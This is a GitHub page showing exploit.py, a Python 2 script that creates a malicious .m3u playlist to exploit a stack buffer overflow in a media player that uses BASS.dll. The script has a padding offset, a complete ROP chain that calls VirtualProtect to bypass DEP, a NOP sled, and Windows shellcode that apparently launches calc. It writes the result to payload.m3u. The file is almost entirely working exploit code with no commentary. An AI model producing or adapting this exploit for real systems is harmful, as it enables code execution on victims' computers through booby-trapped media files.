-
Notifications
You must be signed in to change notification settings - Fork 11
/
Copy pathexploit.py
49 lines (40 loc) · 2.96 KB
/
exploit.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
import struct
def p32(x):
return struct.pack('<I', x)
junk = "A" * 1012
rop_chain = ""
rop_chain += p32(0x10016218) # POP EDI # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x10010180) # "retn" | {PAGE_EXECUTE_READWRITE} [BASS.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.3
rop_chain += p32(0x1001e377) # POP ESI # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x100177e4) # "jmp [eax]" | {PAGE_EXECUTE_READWRITE} [BASS.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.3
rop_chain += p32(0x100106e1) # POP EBP # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x100106e1) # Clean ptr VirtualProtect from stack
rop_chain += p32(0x10015f77) # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0xfffffd97) # -0x269 = 0xfffffd97 => EAX
rop_chain += p32(0x10014db4) # NEG EAX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x10032f72) # XCHG EAX,EBX # RETN 0x00 ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x10015f77) # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0xffffffc0) # -0x40 = 0xffffffc0 => EAX
rop_chain += p32(0x10014db4) # NEG EAX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x10038a6c) # XCHG EAX,EDX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x100163c7) # POP ECX # RETN ** [BASS.dll] ** | {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x101082ca) # Location where it will write last permissions
rop_chain += p32(0x10015f77) # POP EAX # RETN ** [BASS.dll] ** | ascii {PAGE_EXECUTE_READWRITE}
rop_chain += p32(0x1060e25c) # ptr VirtualProtect() in bassmidi (base + 0x0000e25c) : 0x7c801ad4 (ptr to kernel32.virtualprotect)
rop_chain += p32(0x1001d7a5) # "pushad" | {PAGE_EXECUTE_READWRITE} [BASS.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.3
rop_chain += p32(0x100222c5) # jmp esp | {PAGE_EXECUTE_READWRITE} [BASS.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v2.3
nops = "\x90" * 10
shellcode = ""
shellcode += "\x31\xdb\x64\x8b\x7b\x30\x8b\x7f\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b"
shellcode += "\x77\x20\x8b\x3f\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03\x78\x3c\x8b"
shellcode += "\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x89\xdd\x8b\x34\xaf\x01\xc6"
shellcode += "\x45\x81\x3e\x43\x72\x65\x61\x75\xf2\x81\x7e\x08\x6f\x63\x65\x73"
shellcode += "\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7"
shellcode += "\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9\xb1\xff\x53\xe2\xfd\x68\x63\x61"
shellcode += "\x6c\x63\x89\xe2\x52\x52\x53\x53\x53\x53\x53\x53\x52\x53\xff\xd7"
payload = junk + rop_chain + nops + shellcode
print "[+] Creating .m3u payload of size " + str(len(payload)) + "."
file = open('payload.m3u','w');
file.write(payload);
file.close();
print "[+] Payload created successfully."